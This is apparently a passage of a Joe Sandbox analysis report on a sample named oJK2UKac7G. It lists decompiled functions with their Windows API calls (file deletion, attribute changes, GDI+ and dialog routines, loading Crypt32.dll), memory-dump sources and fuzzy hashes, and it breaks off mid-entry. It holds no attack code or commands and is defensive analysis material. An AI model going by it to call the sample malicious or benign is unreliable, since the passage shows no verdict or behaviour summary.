    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
    • String ID:
    • API String ID: 400815659-0
    • Opcode ID: 1179616e079012795da90f227714b16f9de97b5cc9755db6ef2563573fb9796c
    • Instruction ID: c0de008ab3f13b18151c2c952ea6d4c483902df256c7783768540d99d0cdb678
    • Opcode Fuzzy Hash: 1179616e079012795da90f227714b16f9de97b5cc9755db6ef2563573fb9796c
    • Instruction Fuzzy Hash: B4E06D92A0A91551DAE5327F2C16BEF0705DBD2371F250327FA28D72C3EE648902619A
    Function 00C9B8E6 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
    Download Yara Rule
    APIs
    • SetFileAttributesW.KERNEL32(?,00000000,00000001,?,00C9B5B5,?,?,?,00C9B405,?,00000001,00000000,?,?), ref: 00C9B8FA
      • Part of subcall function 00C9CF32: _wcslen.LIBCMT ref: 00C9CF56
    • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00C9B5B5,?,?,?,00C9B405,?,00000001,00000000,?,?), ref: 00C9B92B
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AttributesFile$_wcslen
    • String ID:
    • API String ID: 2673547680-0
    • Opcode ID: a28b460c670c044ebce76775998d17c3f748bc89a75fcc85f319ea75c13f1918
    • Instruction ID: 00b4308923659d158998758ceb1922928936baf883072652e4688aa2b96fae49
    • Opcode Fuzzy Hash: a28b460c670c044ebce76775998d17c3f748bc89a75fcc85f319ea75c13f1918
    • Instruction Fuzzy Hash: 6AF0A93115420ABBDF115FA0DC54BDE37ACBF043C5F048062FA54D6160DB31DE95AA20
    Function 00C9B470 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
    Download Yara Rule
    APIs
    • DeleteFileW.KERNEL32(?,00000000,?,00C9A438,?,?,?,?,00C9892B,?,?,?,00CC37FF,000000FF), ref: 00C9B481
      • Part of subcall function 00C9CF32: _wcslen.LIBCMT ref: 00C9CF56
    • DeleteFileW.KERNEL32(?,?,?,00000800,?,00C9A438,?,?,?,?,00C9892B,?,?,?,00CC37FF,000000FF), ref: 00C9B4AF
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: DeleteFile$_wcslen
    • String ID:
    • API String ID: 2643169976-0
    • Opcode ID: b63360d3a2ec223f0255bd5d6f00d150ea22e62eaf6e9d3aa3b8e34c0d436fb2
    • Instruction ID: 5c645a660226618fc62646229e933ff796909e763ff523b42704b22971e84134
    • Opcode Fuzzy Hash: b63360d3a2ec223f0255bd5d6f00d150ea22e62eaf6e9d3aa3b8e34c0d436fb2
    • Instruction Fuzzy Hash: D4E092321402197BEF115BA0DC45FDE379DBB043C6F448025BA45D2091DB74DD85AA50
    Function 00CABD71 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
    Download Yara Rule
    APIs
    • GdiplusShutdown.GDIPLUS(?,?,?,?,00CC37FF,000000FF), ref: 00CABDA5
    • CoUninitialize.COMBASE(?,?,?,?,00CC37FF,000000FF), ref: 00CABDAA
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: GdiplusShutdownUninitialize
    • String ID:
    • API String ID: 3856339756-0
    • Opcode ID: 8cc1faa100c07c5be44bb80b5dddd21aacc39795399934104b178ba822aa39a9
    • Instruction ID: 47d96e476bdbe491f2c994e53bb60b3d62e1a9e6d4c01ead016f46f369a57b2e
    • Opcode Fuzzy Hash: 8cc1faa100c07c5be44bb80b5dddd21aacc39795399934104b178ba822aa39a9
    • Instruction Fuzzy Hash: BEE06D72604A51EFC7119B88DC46F4DFBA8FB89B24F04822AF416937A0CB74A801CA91
    Function 00C9B4D3 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
    Download Yara Rule
    APIs
    • GetFileAttributesW.KERNEL32(?,?,?,00C9B4CA,?,00C98042,?), ref: 00C9B4E4
      • Part of subcall function 00C9CF32: _wcslen.LIBCMT ref: 00C9CF56
    • GetFileAttributesW.KERNEL32(?,?,?,00000800,?,?,00C9B4CA,?,00C98042,?), ref: 00C9B510
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AttributesFile$_wcslen
    • String ID:
    • API String ID: 2673547680-0
    • Opcode ID: 1bf300b5256a31490b0d29111be31cf9abb844e3b671fb6646bc3fb6906671e9
    • Instruction ID: 4d9c4dc1c050347bbaad1a657992ecea4703c8f4d557ab25ad25af6bd4ae98ea
    • Opcode Fuzzy Hash: 1bf300b5256a31490b0d29111be31cf9abb844e3b671fb6646bc3fb6906671e9
    • Instruction Fuzzy Hash: ABE092715402287BCF20ABA4EC08BD977A8AB093E1F014160FE59E3191D770DE418AD0
    Function 00CAEFF2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
    Download Yara Rule
    APIs
    • _swprintf.LIBCMT ref: 00CAF01C
      • Part of subcall function 00C94A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C94A33
    • SetDlgItemTextW.USER32(00000065,?), ref: 00CAF033
      • Part of subcall function 00CAC748: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CAC759
      • Part of subcall function 00CAC748: KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 00CAC76A
      • Part of subcall function 00CAC748: IsDialogMessageW.USER32(000103D6,?), ref: 00CAC77E
      • Part of subcall function 00CAC748: TranslateMessage.USER32(?), ref: 00CAC78C
      • Part of subcall function 00CAC748: DispatchMessageW.USER32(?), ref: 00CAC796
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: Message$CallbackDialogDispatchDispatcherItemPeekTextTranslateUser__vswprintf_c_l_swprintf
    • String ID:
    • API String ID: 3954729096-0
    • Opcode ID: bc7aaf38e7c9680fde5a72f7d981435f44361a97acd4e9b06d6c29a2bbf04ab8
    • Instruction ID: f3e8b5efd6f14f17bc6f7905c8c0fc5d4763032c29c865168dd57348232c4235
    • Opcode Fuzzy Hash: bc7aaf38e7c9680fde5a72f7d981435f44361a97acd4e9b06d6c29a2bbf04ab8
    • Instruction Fuzzy Hash: 3BE092764142483ADF02B7A5DC0AFEE3BAC6B053CDF080462B241D60A2D6B49612AB62
    Function 00CA1B34 Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON
    Download Yara Rule
    APIs
    • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CA1B4F
    • LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,00CA0633,Crypt32.dll,00000000,00CA06AD,00000200,?,00CA0690,00000000,00000000,?), ref: 00CA1B71
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: DirectoryLibraryLoadSystem
    • String ID:
    • API String ID: 1175261203-0
    • Opcode ID: 3e4d06363ee323ffa62e656ca1e0f4b0f82ccb5fea683ace3f52813b20f36d6c
    • Instruction ID: 9247e2321637d7f02dd435397f236dca925de30f4e90759ada1b5735d28c2808
    • Opcode Fuzzy Hash: 3e4d06363ee323ffa62e656ca1e0f4b0f82ccb5fea683ace3f52813b20f36d6c
    • Instruction Fuzzy Hash: 1FE048764001286BDF1197A4DC08FDA77ACEF093C1F044066B645D2004DA74DA84CBB0
    Function 00CAB3B8 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
    Download Yara Rule
    APIs
    • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00CAB3D9
    • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00CAB3E0
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: BitmapCreateFromGdipStream
    • String ID:
    • API String ID: 1918208029-0
    • Opcode ID: 1676cbafb4242c8f760a22c1072deff327b2391e22ee29a0062a0b467398f129
    • Instruction ID: 73dd1523e4a997f4f7b1f75bc4de39757050cccd0ade2aaae05587091498daab
    • Opcode Fuzzy Hash: 1676cbafb4242c8f760a22c1072deff327b2391e22ee29a0062a0b467398f129
    • Instruction Fuzzy Hash: 84E09271801209EFCB10DF89C441B9DB7F8EB05354F20806FF95593211D770AF449B90
    Function 00CB3D0C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
    Download Yara Rule
    APIs
    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CB3D2A
    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00CB3D35
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: Value___vcrt____vcrt_uninitialize_ptd
    • String ID:
    • API String ID: 1660781231-0
    • Opcode ID: bf25f0d121774e58b946711d49b58b121bba71d188958acc4845f203c39a2efe
    • Instruction ID: ad7549eb4adb3582ea2912c555535b18967a30ac84008f1f10156def46af272b
    • Opcode Fuzzy Hash: bf25f0d121774e58b946711d49b58b121bba71d188958acc4845f203c39a2efe
    • Instruction Fuzzy Hash: 40D022310687D8148E1C27B8BC036EF2388A9117B2FB02756E030CE1C2EE20CB007022
    Function 00C912D1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: ItemShowWindow
    • String ID:
    • API String ID: 3351165006-0
    • Opcode ID: f12a47fcd966784e84f539a7ff07307dd0b426f716ee60c245523c382271265a
    • Instruction ID: 36dd4440d61995ba05bbf1210761d79bb5b686bda47d82731011cbec799a111e
    • Opcode Fuzzy Hash: f12a47fcd966784e84f539a7ff07307dd0b426f716ee60c245523c382271265a
    • Instruction Fuzzy Hash: 25C01232058900BECB010B70DC09F3E7FA8AB94212F10C904F2A5C1060C239C010DB12
    Function 00C91AD3 Relevance: 1.8, APIs: 1, Instructions: 319COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: e96036da911f2f411cd4bfde1bead5a03bffc54a913b0b6708aa15e909a95a41
    • Instruction ID: dc381c4164e83250904e9cc844226b1ec2b7506bee52b251d2a69d1d42c35944
    • Opcode Fuzzy Hash: e96036da911f2f411cd4bfde1bead5a03bffc54a913b0b6708aa15e909a95a41
    • Instruction Fuzzy Hash: F4C1B335A002569FDF25CF28C89EBAD7BA5AF46310F1C01B9EC159B396C7309B44CB61
    Function 00C990A2 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 00C990A7
      • Part of subcall function 00C913F8: __EH_prolog.LIBCMT ref: 00C913FD
      • Part of subcall function 00C92032: __EH_prolog.LIBCMT ref: 00C92037
      • Part of subcall function 00C9B966: FindClose.KERNEL32(00000000,000000FF,?,?), ref: 00C9B991
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: H_prolog$CloseFind
    • String ID:
    • API String ID: 2506663941-0
    • Opcode ID: b097d6244bdcffbd8ed365a4656df59132f938ec6f1275b2bb819c5f3876c5e5
    • Instruction ID: bc851b797928c077b13536ac50860adcb9c5f4aaa19dd61a0ec10b6ab649cdde
    • Opcode Fuzzy Hash: b097d6244bdcffbd8ed365a4656df59132f938ec6f1275b2bb819c5f3876c5e5
    • Instruction Fuzzy Hash: 0C41B171904654AADF24DB64C8A9AEA73B8FF10340F0400EEF58AA7082DB716F89DF10
    Function 00C913FD Relevance: 1.6, APIs: 1, Instructions: 107COMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 00C913FD
      • Part of subcall function 00C96891: __EH_prolog.LIBCMT ref: 00C96896
      • Part of subcall function 00C9E298: __EH_prolog.LIBCMT ref: 00C9E29D
      • Part of subcall function 00C9644D: __EH_prolog.LIBCMT ref: 00C96452
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: 65c0509443fc09a66c353db61fc4fac45a5c08e66b42f45e0768c508cb411e7c
    • Instruction ID: 57d05d74e2b637a236d6d1b8c03721a5c434aab4314ec5c5074f9ed04767625b
    • Opcode Fuzzy Hash: 65c0509443fc09a66c353db61fc4fac45a5c08e66b42f45e0768c508cb411e7c
    • Instruction Fuzzy Hash: D35135B1A063808EDF14DF6994852D9BBE5AF59300F0802BEEC5DCF69BD7715214CB62
    Function 00C913F8 Relevance: 1.6, APIs: 1, Instructions: 106COMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 00C913FD
      • Part of subcall function 00C96891: __EH_prolog.LIBCMT ref: 00C96896
      • Part of subcall function 00C9E298: __EH_prolog.LIBCMT ref: 00C9E29D
      • Part of subcall function 00C9644D: __EH_prolog.LIBCMT ref: 00C96452
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: 6dfb7685e3eeee75540fdbcb5e3ac6702196de4eea177dec73eaf7c2e80a6a37
    • Instruction ID: 0a664306298acd546c3765a80c00a47b397bbcc45c9a827f54468a2bcb98c8d5
    • Opcode Fuzzy Hash: 6dfb7685e3eeee75540fdbcb5e3ac6702196de4eea177dec73eaf7c2e80a6a37
    • Instruction Fuzzy Hash: 1F5133B19063808EDF14DF6994852D9BBE5AF5A300F0802BEEC5DCF68BD7711214CBA2
    Function 00CA479D Relevance: 1.6, APIs: 1, Instructions: 89COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: f181f1448e32fc7bcb8309381a2cac6d9a066977f2981f7cadede2765b85e407
    • Instruction ID: 2c83a4b9fc2c61073620350f21055d2f55a847e450cab8fbe1525476faa36ce4
    • Opcode Fuzzy Hash: f181f1448e32fc7bcb8309381a2cac6d9a066977f2981f7cadede2765b85e407
    • Instruction Fuzzy Hash: 9C21F8B1E40256AFDB18DF78DC4665B7AACFF45318F04423AE515E7682D3B49E00C6A8
    Function 00CAC207 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 00CAC20C
      • Part of subcall function 00C913F8: __EH_prolog.LIBCMT ref: 00C913FD
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: a7a321c43763ae16b9b2d28c0284f9d27395f88c2c1127b661601dda62ec2d1d
